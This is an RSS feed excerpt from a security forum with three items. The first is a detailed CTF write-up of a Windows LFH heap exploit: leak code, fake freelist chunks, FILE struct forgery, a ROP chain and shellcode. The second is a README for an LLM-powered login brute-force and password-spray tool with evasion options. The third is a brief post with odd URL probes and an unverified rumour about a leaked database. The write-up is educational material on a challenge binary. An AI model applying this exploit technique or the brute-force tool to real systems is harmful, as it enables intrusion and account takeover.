			
				The location of a chunk allocated by LFH is more deterministic
			
			
				There are less safety checks in LFH as compared to the private heap as it is made for performance.
			
		

		
		
			Arbitrary Read
		

		
			As I said earlier we need to activate the LFH by subsequently making 18 similar allocations. Since LFH is now activated we need to fill the UserBlock.
		 

		
			
				
					
						
							1
2
3
4

						
						
							for i in range(19):
    add(f'LFH_{i}', 0x90, 'LFH')
for i in range(0x10):
    add(f'record_{i}', 0x90, 'LFH')

						
					
				
			
		

		
			We’ll now create a hole using the remove feature. This time we’ll reuse and update an existing record and if we request for an allocation of size equal to the size of our record structure ie. (0x60 bytes) we’ll get the same chunk and write some data into it. The userblock layout will look somewhat like this after these steps.
		 

		
			
		 

		
			We write the following code to do it.
		 

		
			
				
					
						
							1
2
3
4

						
						
							remove('record_0')
add('record_1', 0x60, 'A'*0x60)
#now viewing it leaks the information about the chunk below it 💀
view('record_1')

						
					
				
			
		

		
			Afterwards we could also overflow this data buffer to overwrite the data pointer of the next record structure in memory and use the VIEW feature to finally gain arbitrary read. 🙌
		 

		
			
		 

		
			
				
					
						
							1
2
3
4

						
						
							def leak(addr):
    add(b'fill_1', 0x60, b'A' * 0x70 + p64(addr))
    view(next_record)
    return u64(proc.recv(8))

						
					
				
			
		

		
			We need to leak the following :
		 

		
			
				
					Heap Base Address 
					Using the arbitrary leak we could easily get the Data pointer and therefore the heap base address.
				 
			
			
				
					ntdll Base Address 
					There exists a lock variable in the Heap structure at an offset ie. 0x2c0 which could help to leak ntdll base address. 
					 
					You could refer the following to verify. We could also confirm this via the !address command to check which module does this lie in. 
					
				 
			
			
				
					PEB 
					Fortunately there exists a pointer to PEB’s TlsExpansionBitmapBits member inside ntdll. We could grab its offset to leak PEB as well.
				 
			
			
				
					Stack Limit from TEB 
					Usually the TEB for the specific thread is at PEB_addr + 0x1000 
					
				 
			
			
				
					PEBLdr 
					We can easily get it from PEB as its at the 0x18 offset.
				 
			
			
				
					InLoadOrderModuleList 
					Its at 0x10 offset in PEBLdr. 
					
				 
			
			
				
					Binary Base 
					Its the first member in the InLoadOrderModuleList.
				 
			
			
				
					Kernel32 Base Address (Get Address of CreateFile, ReadFile &amp; WriteFile) 
					We’ll need to call these WinAPIs in our rop chain. We could also get it from the InLoadOrderModuleList as well but it is quite easier to just make use of the challenge binary’s Import Address Table to get some specific WinAPI offset for eg. ReadFile and then later calculate its offset from base.
				 
			
			
				
					Process Parameters (stdout) 
					Process Parameters is a member of PEB which contains the handle to our process stdout (we’ll eventually need this later).
				 
			
		

		
			Finding Return Address on Stack
		

		
			Now we could use the stack limit from the TEB to scan for the return address location in stack. We could try overwriting the return address of a write call used in the View feature.
		 

		
			
		 

		
			We could also add some seed to stack limit to land near the return address.
		 

		
			
				
					
						
							1
2
3
4
5
6
7
8
9
10
11
12

						
						
							target = bin_base + 0x1b60
ret_addr = stack_limit + 0x2800
found = False
for i in range(0x1000 // 8):
    val_addr = leak(ret_addr)
    print(i, hex(ret_addr), hex(val_addr))
    if val_addr == target:
        print('Found return address')
        found = True
        break
    ret_addr += 8
assert found

						
					
				
			
		

		
		
			Arbitrary Write
		

		
			Now all we need is to overwrite the return address in stack but we need an arbitrary write primitive to do that. For that we need to take a look at the heap chunk structure in windows. The chunk header is 16 bytes and the free chunk includes two pointers, FLink and BLink which point to other free chunks in the freelist.
		 

		
			
		 

		
			If you’ll observe carefully we’ve the following pointers in the data section. What if we could overwrite that File Stream pointer and use File Struct exploitation to gain arbitrary write? HUH! Sounds interesting right? Lets try to forge fake chunks and overwrite these pointers. 
		 

		
			
		 

		
			First, we need to create a heap layout in memory with some holes as follows.
		 

		
			
		 

		
			This could be done in the following manner.
		 

		
			
				
					
						
							1
2
3
4
5
6
7

						
						
							add(b'A', 0x400, b'AAAA' * 8)
add(b'A', 0x100, b'AAAA' * 8)
add(b'B', 0x100, b'BBBB' * 8) 
add(b'C', 0x100, b'CCCC' * 8)
add(b'D', 0x100, b'DDDD' * 8)
remove(b'D')
remove(b'B')

						
					
				
			
		

		
			now if we view A we could leak the following:
		 

		
			
				B’s Flink and Blink
			
			
				D’s Flink and Blink
				
					
						
							
								
									1
2
3
4
5
6
7
8
9
10

								
								
									proc.recv(0x100) # recv all A data
fake_chunk_header = proc.recv(0x10) # recv B header which is 16 bytes
# now get B's FLink and BLink
B_flink = u64(proc.recv(8)) # the FLink should point to D
B_blink = u64(proc.recv(8))
proc.recv(0x100 + 0x110) # skip B's data, C's data and D's header
# now get B's FLink and BLink
D_flink = u64(proc.recv(8))
D_blink = u64(proc.recv(8))
B_addr = D_blink

								
							
						
					
				
				We could now unlink D from B and link the password and username fake chunks to B instead. This could be done in the following manner.
			
		

		
			
				
					
						
							1
2
3
4
5
6
7
8
9
10
11

						
						
							pass_adr = bin_base + 0x5648
user_adr = bin_base + 0x5620
add(b'A', 0x100, b'A' * 0x100 + fake_chunk_header + p64(pass_adr + 0x10))
logout()
# Freelist : B-&gt;fake2(pass)-&gt;fake1(user)
fake2 = b'phdphd\x00'.ljust(8, b'\x00') + fake_chunk_header[8:]
#the flink is fake chunk at user buf and blink is B chunk
fake2 += p64(user_adr + 0x10) + p64(D_blink) 
fake1 = b'ddaa\x00'.ljust(8, b'\x00') + fake_chunk_header[8:]
# flink is flink of D and blink is fake chunk at password
fake1 += p64(D_flink) + p64(pass_adr + 0x10) 

						
					
				
			
		

		
			After creating those fake chunks our freelist looks like following.
		 

		
			
		 

		
			We had to forge two chunks as while unlinking password chunk from the freelist malloc would check for list integrity as : 
			fd-&gt;bk == candidate and bk-&gt;fd == candidate 
			So we the fake chunk at user buff will have the BLink pointing to password which would succeed here.
		 

		
			File Struct Exploitation
		

		
			Now we could use file struct exploitation here to overwrite the File Stream pointer and get arbitrary write. Lets discuss how  
			The file struct on windows is defined in ucrtbase.dll and looks like the following
		 

		
			
				
					
						
							1
2
3
4
5
6
7
8
9
10
11

						
						
							typedef struct _iobuf
{
    char*   _ptr;       // Pointer to next character in buffer.
    int     _cnt;       // Remaining chars in buffer for read/write.
    char*   _base;      // Pointer to start of buffer.
    int     _flag;      // Stream state flags (read/write/error/EOF).
    int     _file;      // CRT file descriptor index.
    int     _charbuf;   // Single-char buffer (e.g., for ungetc).
    int     _bufsiz;    // Size of the buffer in bytes.
    char*   _tmpfname;  // Name of temp file if created, else NULL.
} FILE;

						
					
				
			
		

		
			Now we could use this information to craft our own FILE object and overwrite the File Stream pointer sitting just below our fake password chunk.
		 

		
			
				
					_base 
					Memory address which we want to overwrite which is the return address in our case.
				 
			
			
				
					_file 
					File Descriptor of STDIN ie. 0 (which is used to write into the address specified in _base)
				 
			
			
				
					_flag 
					We need to set this to both of the following:
				 

				
					
						
							
								
									1
2
3
4
5
6
7
8

								
								
									// (*) USER:     The buffer was allocated by the user and was configured via
//               the setvbuf() function.
_IOBUFFER_USER    = 0x0080,

// Allocation state bit:  When this flag is set it indicates that the stream
// is currently allocated and in-use.  If this flag is not set, it indicates
// that the stream is free and available for use.
_IOALLOCATED      = 0x2000,

								
							
						
					
				
			
			
				
					_bufsiz 
					It should be just more than how many bytes you are planning to write into the address. We’ll keep it 0x200 for now.
				 
			
		

		
			The overall code for creating the File Stream object looks like following.
		 

		
			
				
					
						
							1
2
3
4
5
6
7
8
9
10
11
12

						
						
							_IOBUFFER_USER = 0x80
_IOALLOCATED = 0x2000

cnt = 0
_ptr = 0
_base = ret_addr
flag = _IOBUFFER_USER | _IOALLOCATED
fd = 0
bufsize = 0x200
obj = p64(_ptr) + p64(_base) + p32(cnt) + p32(flag)
obj += p32(fd) + p32(0) + p64(bufsize) +p64(0)
obj += p64(0xffffffffffffffff) + p32(0xffffffff) + p32(0) + p64(0)*2

						
					
				
			
		

		
			Now we need to do a login which in turn will invoke the fread function and our malformed File object would be used then.
		 

		
			If you refer the previous freelist image you’ll notice that B is at the top, therefore we could pop it and write our malformed FILE object into it.
		 

		
			
				
					
						
							1

						
						
							add(b'WeGetBChunkHere', 0x100, obj)

						
					
				
			
		

		
			Afterwards we’ll get our password chunk for next allocation. And now we could overwrite the address of B chunk(contains our File Object now) to the File Stream pointer as from the layout it is just below it.
		 

		
			
				
					
						
							1

						
						
							add(b'WeGetPassChunk', 0x100, b'a' * 0x10 + p64(B_addr))

						
					
				
			
		

		
			We managed to successfully overwrite the File Stream pointer! 💪
		 

		
		
			Constructing our ROP Chain
		

		
			The No-Child-Process mitigation is turned on for this challenge so we can’t really spawn another process to read the flag and have to write shellcode for reading the flag. We could make use of the Kernel32 APIs we got earlier here.
		 

		
			We will use the ReadFile WinAPI to read our shellcode at a particular address in data section. Afterwards we need to use VirtualProtect to turn that region executable.
		 

		
			Please keep in mind on Windows, WinAPI arguments are passed right-to-left on the stack in x86 (stdcall) and via RCX, RDX, R8, R9 registers with stack for extras in x64 (Microsoft x64 calling convention)
		 

		
			And fortunately we find the perfect gadget in ntdll to fill in these registers.
		 

		
			
		 

		
			Now we get offsets of all the required WinApis as well.
		 

		
			
				
					
						
							1
2
3
4
5
6

						
						
							pop_rdx_rcx_r8_r9_r10_r11 = ntdll + 0x8fc30
shellcode_addr = program + 0x5000
readfile = kernel32 + 0x22680
virtualprotect = kernel32 + 0x1b680
writefile = kernel32 + 0x22770
createfile = kernel32 + 0x222f0

						
					
				
			
		

		
			Our final rop chain looks like the following:
		 

		
			
				
					
						
							1
2
3
4
5
6
7

						
						
							buf = p64(pop_rdx_rcx_r8_r9_r10_r11) + p64(shellcode_addr)
buf += p64(stdin) + p64(0x100) +p64(shellcode_addr + 0x100) + p64(10) + p64(11) + p64(readfile)
buf += p64(pop_rdx_rcx_r8_r9_r10_r11) + p64(0x1000) + p64(shellcode_addr)
buf += p64(0x40) + p64(ret_addr + 0x100 - 8) + p64(0) + p64(11)
buf += p64(virtualprotect) + p64(shellcode_addr)
proc.send(buf.ljust(0x100 - 8) + p64(0x4))


						
					
				
			
		

		
			Our shellcode for reading the flag would be:
		 

		
			
				
					
						
							1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

						
						
							    jmp getflag
flag:
    pop r11
createfile:
    mov qword ptr [rsp + 0x30], 0
    mov qword ptr [rsp + 0x28], 0x80
    mov qword ptr [rsp + 0x20], 3
    xor r9, r9
    mov r8, 1
    mov rdx, 0x80000000
    mov rcx, r11
    mov rax, {createfile}
    call rax
readfile:
    mov qword ptr [rsp + 0x20], 0
    lea r9, [rsp + 0x200]
    mov r8, 0x100
    lea rdx, [rsp + 0x100]
    mov rcx, rax
    mov rax, {readfile}
    call rax
writefile:
    mov qword ptr [rsp + 0x20], 0
    lea r9, [rsp + 0x200]
    mov r8, 0x100
    lea rdx, [rsp + 0x100]
    mov rcx, {stdout}
    mov rax, {writefile}
    call rax
loop:
    jmp loop
getflag:
    call flag

						
					
				
			
		

		
			Here is our final exploit in action!
		 

		
			
		 

		
		
			Final Thoughts
		

		
			This was a good little exercise for learning the basics. Thanks to my friend @Owl.A for helping me out with my doubts :). I was procastinating a lot so wrote it in a hurry which we’ll help me prepare notes as well, hope you liked it! I’m still deepening my understanding of Windows user‑mode heap internals and exploitation techniques so constructive feedback and corrections are very welcome. If you’d like more deep dives, practical demos, and writeups on heap exploitation, keep an eye on this blog — there’s more coming. 😉
		 

		
			
				The exploit code could be found here : 
				mrT4ntr4/Challenge-Solution-Files/HitconQuals_2019_dadadb
			 
		

		
			References
		

		
			https://www.slideshare.net/AngelBoy1/windows-10-nt-heap-exploitation-english-version 
			https://github.com/scwuaptx/CTF/tree/master/2019-writeup/hitcon/dadadb 
			https://jackgrence.github.io/HITCON-CTF-2019-dadadb-Writeup/ 
			https://chujdk.github.io/wp/1624.html 
			https://github.com/peleghd/Windows-10-Exploitation/blob/master/Low_Fragmentation_Heap_(LFH)_Exploitation_-_Windows_10_Userspace_by_Saar_Amar.pdf
		 

		
			 
		 

		
			Sursa: https://mrt4ntr4.github.io/Windows-Heap-Exploitation-dadadb/]]></description><pubDate>Sun, 28 Sep 2025 08:09:18 +0000</pubDate></item><item><title>BruteForceAI - AI-Powered Login Brute Force Tool</title><link><![CDATA[https://rstforums.com/forum/topic/123945-bruteforceai-ai-powered-login-brute-force-tool/?do=findComment&comment=701308]]></link><description><![CDATA[BruteForceAI - AI-Powered Login Brute Force Tool
	



	
		   
	 

	
		Advanced LLM-powered brute-force tool combining AI intelligence with automated login attacks
	 

	
		Features • Installation • Usage • Examples • Configuration • License
	 




	
		🎯 About
	



	BruteForceAI is an advanced penetration testing tool that revolutionizes traditional brute-force attacks by integrating Large Language Models (LLM) for intelligent form analysis. The tool automatically identifies login form selectors using AI, then executes sophisticated multi-threaded attacks with human-like behavior patterns.
 


	
		🧠 LLM-Powered Form Analysis
	



	
		Stage 1 (AI Analysis): LLM analyzes HTML content to identify login form elements and selectors
	
	
		Stage 2 (Smart Attack): Executes intelligent brute-force attacks using AI-discovered selectors
	



	
		🚀 Advanced Attack Features
	



	
		Multi-threaded execution with synchronized delays
	
	
		Bruteforce &amp; Password Spray attack modes
	
	
		Human-like timing with jitter and randomization
	
	
		User-Agent rotation for better evasion
	
	
		Webhook notifications (Discord, Slack, Teams, Telegram)
	
	
		Comprehensive logging with SQLite database
	




	
		🌟 Star History
	



	
 



	
		✨ Features
	



	
		🔍 Intelligent Analysis
	



	
		LLM-powered form selector identification (Ollama/Groq)
	
	
		Automatic retry with feedback learning
	
	
		DOM change detection for success validation
	
	
		Smart HTML content extraction
	



	
		⚡ Advanced Attacks
	



	
		Bruteforce Mode: Try all username/password combinations
	
	
		Password Spray Mode: Test each password against all usernames
	
	
		Multi-threaded execution (1-100+ threads)
	
	
		Synchronized delays between attempts for same user
	



	
		🎭 Evasion Techniques
	



	
		Random User-Agent rotation
	
	
		Configurable delays with jitter
	
	
		Human-like timing patterns
	
	
		Proxy support
	
	
		Browser visibility control
	



	
		📊 Monitoring &amp; Notifications
	



	
		Real-time webhook notifications on success
	
	
		Comprehensive SQLite logging
	
	
		Verbose timestamped output
	
	
		Success exit after first valid credentials
	
	
		Skip existing attempts (duplicate prevention)
	



	
		🛠️ Operational Features
	



	
		Output capture to files
	
	
		Colorful terminal interface
	
	
		Network error retry mechanism
	
	
		Force retry existing attempts
	
	
		Database management tools
	
	
		Automatic update checking from mordavid.com
	




	
		🔧 Installation
	



	
		Prerequisites
	



	# Python 3.8 or higher
python --version

# Install Playwright browsers
playwright install chromium

	
		 
	



	
		Install Dependencies
	



	pip install -r requirements.txt

	
		 
	



	Required packages:
 


	
		playwright - Browser automation
	
	
		requests - HTTP requests
	
	
		PyYAML - YAML parsing for update checks
	



	
		LLM Setup
	



	
		Option 1: Ollama (Local)
	



	# Install Ollama
curl -fsSL https://ollama.ai/install.sh | sh

# Pull recommended model
ollama pull llama3.2:3b

	
		 
	



	
		Option 2: Groq (Cloud)
	



	
		Get API key from Groq Console
	
	
		Use with --llm-provider groq --llm-api-key YOUR_KEY
	



	
		🧠 Model Selection &amp; Performance
	



	
		Recommended Models by Provider
	



	Ollama (Local):
 


	
		llama3.2:3b - Default, good balance of speed and quality
	
	
		llama3.2:1b - Fastest, smaller model for quick analysis
	
	
		qwen2.5:3b - Alternative with good performance
	



	Groq (Cloud):
 


	
		llama-3.3-70b-versatile - Default &amp; Best - Latest model with superior quality (1 attempt)
	
	
		llama3-70b-8192 - Fast and reliable alternative (1 attempt)
	
	
		gemma2-9b-it - Lightweight option, good for simple forms (1 attempt)
	
	
		llama-3.1-8b-instant - ⚠️ Not recommended (rate limiting issues, 3+ attempts)
	



	
		Performance Tips
	



	# Best quality (recommended for complex forms)
python main.py analyze --urls targets.txt --llm-provider groq --llm-model llama-3.3-70b-versatile --llm-api-key YOUR_KEY

# Fast and reliable
python main.py analyze --urls targets.txt --llm-provider groq --llm-model llama3-70b-8192 --llm-api-key YOUR_KEY

# Lightweight for simple forms
python main.py analyze --urls targets.txt --llm-provider groq --llm-model gemma2-9b-it --llm-api-key YOUR_KEY

# Local processing (no API key needed)
python main.py analyze --urls targets.txt --llm-provider ollama --llm-model llama3.2:3b

	
		 
	




	
		📖 Usage
	



	
		Basic Commands
	



	
		Stage 1: Analyze Login Forms
	



	python main.py analyze --urls urls.txt --llm-provider ollama

	
		 
	



	
		Stage 2: Execute Attack
	



	python main.py attack --urls urls.txt --usernames users.txt --passwords passwords.txt --threads 10

	
		 
	



	
		Command Structure
	



	python main.py &lt;command&gt; [options]

	
		 
	



	
		Available Commands
	



	
		analyze - Analyze login forms with LLM
	
	
		attack - Execute brute-force attacks
	
	
		clean-db - Clean database tables
	
	
		check-updates - Check for software updates
	




	
		🎯 Examples
	



	
		1. Complete Workflow
	



	# Step 1: Analyze forms
python main.py analyze --urls targets.txt --llm-provider ollama --llm-model llama3.2:3b

# Step 2: Attack with 20 threads
python main.py attack --urls targets.txt --usernames users.txt --passwords passwords.txt --threads 20 --delay 5 --jitter 2

	
		 
	



	
		2. Advanced Attack Configuration
	



	python main.py attack \
  --urls targets.txt \
  --usernames users.txt \
  --passwords passwords.txt \
  --mode passwordspray \
  --threads 15 \
  --delay 10 \
  --jitter 3 \
  --success-exit \
  --user-agents user_agents.txt \
  --verbose \
  --output results.txt

	
		 
	



	
		3. With Webhook Notifications
	



	python main.py attack \
  --urls targets.txt \
  --usernames users.txt \
  --passwords passwords.txt \
  --discord-webhook "https://discord.com/api/webhooks/..." \
  --slack-webhook "https://hooks.slack.com/services/..." \
  --threads 10

	
		 
	



	
		4. Browser Debugging
	



	python main.py analyze \
  --urls targets.txt \
  --show-browser \
  --browser-wait 5 \
  --debug \
  --llm-provider ollama

	
		 
	



	
		5. Check for Updates
	



	# Check for software updates
python main.py check-updates

# Check with output to file
python main.py check-updates --output update_check.txt

	
		 
	



	
		Manual Check (Detailed)
	



	# Check for updates manually (same as automatic but can save to file)
python main.py check-updates

# Check with output to file
python main.py check-updates --output update_check.txt

	
		 
	



	
		Skip Version Check
	



	# Skip version check completely for faster startup
python main.py analyze --urls targets.txt --skip-version-check
python main.py attack --urls targets.txt --usernames users.txt --passwords passwords.txt --skip-version-check

# Also works as global flag (before subcommand)
python main.py --skip-version-check analyze --urls targets.txt

	
		 
	




	
		⚙️ Configuration Options
	



	
		Analysis Options
	



	
		
			
				Parameter
			
			
				Description
			
			
				Default
			
		
	
	
		
			
				--llm-provider
			
			
				LLM provider (ollama/groq)
			
			
				ollama
			
		
		
			
				--llm-model
			
			
				Model name
			
			
				llama3.2:3b (ollama), llama-3.3-70b-versatile (groq)
			
		
		
			
				--llm-api-key
			
			
				API key for Groq
			
			
				None
			
		
		
			
				--selector-retry
			
			
				Retry attempts for selectors
			
			
				10
			
		
		
			
				--force-reanalyze
			
			
				Force re-analysis
			
			
				False
			
		
	



	
		Attack Options
	



	
		
			
				Parameter
			
			
				Description
			
			
				Default
			
		
	
	
		
			
				--mode
			
			
				Attack mode (bruteforce/passwordspray)
			
			
				bruteforce
			
		
		
			
				--threads
			
			
				Number of threads
			
			
				1
			
		
		
			
				--delay
			
			
				Delay between attempts (seconds)
			
			
				0
			
		
		
			
				--jitter
			
			
				Random jitter (seconds)
			
			
				0
			
		
		
			
				--success-exit
			
			
				Stop after first success
			
			
				False
			
		
		
			
				--force-retry
			
			
				Retry existing attempts
			
			
				False
			
		
	



	
		Detection Options
	



	
		
			
				Parameter
			
			
				Description
			
			
				Default
			
		
	
	
		
			
				--dom-threshold
			
			
				DOM difference threshold
			
			
				100
			
		
		
			
				--retry-attempts
			
			
				Network retry attempts
			
			
				3
			
		
	



	
		Evasion Options
	



	
		
			
				Parameter
			
			
				Description
			
			
				Default
			
		
	
	
		
			
				--user-agents
			
			
				User-Agent file
			
			
				None
			
		
		
			
				--proxy
			
			
				Proxy server
			
			
				None
			
		
		
			
				--show-browser
			
			
				Show browser window
			
			
				False
			
		
		
			
				--browser-wait
			
			
				Wait time when visible
			
			
				0
			
		
	



	
		Output Options
	



	
		
			
				Parameter
			
			
				Description
			
			
				Default
			
		
	
	
		
			
				--verbose
			
			
				Detailed timestamps
			
			
				False
			
		
		
			
				--debug
			
			
				Debug information
			
			
				False
			
		
		
			
				--output
			
			
				Save output to file
			
			
				None
			
		
		
			
				--no-color
			
			
				Disable colors
			
			
				False
			
		
	



	
		Webhook Options
	



	
		
			
				Parameter
			
			
				Description
			
		
	
	
		
			
				--discord-webhook
			
			
				Discord webhook URL
			
		
		
			
				--slack-webhook
			
			
				Slack webhook URL
			
		
		
			
				--teams-webhook
			
			
				Teams webhook URL
			
		
		
			
				--telegram-webhook
			
			
				Telegram bot token
			
		
		
			
				--telegram-chat-id
			
			
				Telegram chat ID
			
		
	



	
		🔄 Update Management
	



	BruteForceAI includes simple update checking to keep you informed about new releases.
 


	
		Automatic Check
	



	
		Checks for updates every time the tool starts
	
	
		Shows one-line status: either "✅ up to date" or "🔄 Update available"
	
	
		Quick 3-second timeout - no delays
	
	
		Silent network failure (no error messages)
	
	
		Skip with: --skip-version-check flag
	



	
		Manual Check (Detailed)
	



	# Check for updates manually (same as automatic but can save to file)
python main.py check-updates

# Check with output to file
python main.py check-updates --output update_check.txt

	
		 
	



	
		Update Information
	



	
		Up to date: ✅ BruteForceAI v1.0.0 is up to date
	
	
		Update available: 🔄 Update available: v1.0.0 → v1.1.0 | Download: https://github.com/...
	



	
		Performance
	



	
		Timeout: 3 seconds maximum
	
	
		No delays: Instant if network unavailable
	
	
		No spam: One simple line per check
	



	
		Version Source
	



	Updates are checked against: https://mordavid.com/md_versions.yaml
 



	
		🗄️ Database Schema
	



	BruteForceAI uses SQLite database (bruteforce.db) with two main tables:
 


	
		form_analysis
	



	Stores LLM analysis results for each URL.
 


	
		brute_force_attempts
	



	Logs all attack attempts with results and metadata.
 


	
		Database Management
	



	# Clean all data
python main.py clean-db

# View database
sqlite3 bruteforce.db
.tables
.schema

	
		 
	




	
		🔔 Webhook Integration
	



	
		Discord Setup
	



	
		Create webhook in Discord server settings
	
	
		Use webhook URL with --discord-webhook
	



	
		Slack Setup
	



	
		Create Slack app with incoming webhooks
	
	
		Use webhook URL with --slack-webhook
	



	
		Teams Setup
	



	
		Add "Incoming Webhook" connector to Teams channel
	
	
		Use webhook URL with --teams-webhook
	



	
		Telegram Setup
	



	
		Create bot with @BotFather
	
	
		Get bot token and chat ID
	
	
		Use --telegram-webhook TOKEN --telegram-chat-id CHAT_ID
	




	
		⚠️ Legal Disclaimer
	



	FOR EDUCATIONAL AND AUTHORIZED TESTING ONLY
 


	This tool is designed for:
 


	
		✅ Authorized penetration testing
	
	
		✅ Security research and education
	
	
		✅ Testing your own applications
	
	
		✅ Bug bounty programs with proper scope
	



	DO NOT USE FOR:
 


	
		❌ Unauthorized access to systems
	
	
		❌ Illegal activities
	
	
		❌ Attacking systems without permission
	



	Users are responsible for complying with all applicable laws and regulations. The author assumes no liability for misuse of this tool.
 



	
		📋 Changelog
	



	
		v1.0.0 (Current)
	



	
		✨ Initial release
	
	
		🧠 LLM-powered form analysis
	
	
		⚡ Multi-threaded attacks
	
	
		🎭 Advanced evasion techniques
	
	
		🔔 Webhook notifications
	
	
		📊 Comprehensive logging
	
	
		🔄 Automatic update checking
	




	
		👨‍💻 About the Author
	



	Mor David - Offensive Security Specialist &amp; AI Security Researcher
 


	I specialize in offensive security with a focus on integrating Artificial Intelligence and Large Language Models (LLM) into penetration testing workflows. My expertise combines traditional red team techniques with cutting-edge AI technologies to develop next-generation security tools.
 


	
		🔗 Connect with Me
	



	
		LinkedIn: linkedin.com/in/mor-david-cyber
	
	
		Website: www.mordavid.com
	



	
		🛡️ RootSec Community
	



	Join our cybersecurity community for the latest in offensive security, AI integration, and advanced penetration testing techniques:
 


	🔗 t.me/root_sec
 


	RootSec is a community of security professionals, researchers, and enthusiasts sharing knowledge about:
 


	
		Advanced penetration testing techniques
	
	
		AI-powered security tools
	
	
		Red team methodologies
	
	
		Security research and development
	
	
		Industry insights and discussions
	




	
		📄 License
	



	This project is licensed under the Non-Commercial License.
 


	
		Terms Summary:
	



	
		✅ Permitted: Personal use, education, research, authorized testing
	
	
		❌ Prohibited: Commercial use, redistribution for profit, unauthorized attacks
	
	
		📋 Requirements: Attribution, same license for derivatives
	



	See the LICENSE.md file for complete terms and conditions.
 



	
		🙏 Acknowledgments
	



	
		Playwright Team - For the excellent browser automation framework
	
	
		Ollama Project - For making local LLM deployment accessible
	
	
		Groq - For high-performance LLM inference
	
	
		Security Community - For continuous feedback and improvements
	




	
		📊 Statistics
	



	 
 



	
		⭐ Star this repository if you find it useful!
	 

	
		Made with ❤️ by Mor David | Join RootSec Community
	 

	
		 
	 

	
		Sursa: https://github.com/MorDavid/BruteForceAI]]></description><pubDate>Sun, 28 Sep 2025 08:08:43 +0000</pubDate></item><item><title>rstforums vulnerabil iarasi</title><link><![CDATA[https://rstforums.com/forum/topic/123938-rstforums-vulnerabil-iarasi/?do=findComment&comment=701292]]></link><description>https://rstforums.com/?|{___/{../ 
	https://rstforums.com/?.{}__/../+1-2
 


	 
 


	vedeti mai baieti ca trebuie schimbata tema. va zic ceva dar sa nu va suparati. din informatiile mele is niste probleme cu db. cineva a vandut baza de date. nu stiu daca nu e proces pe rol sa va inchida. aveti multi dusmani. sifonari diicot mai oameni.</description><pubDate>Fri, 26 Sep 2025 03:08:48 +0000</pubDate></item></channel></rss>
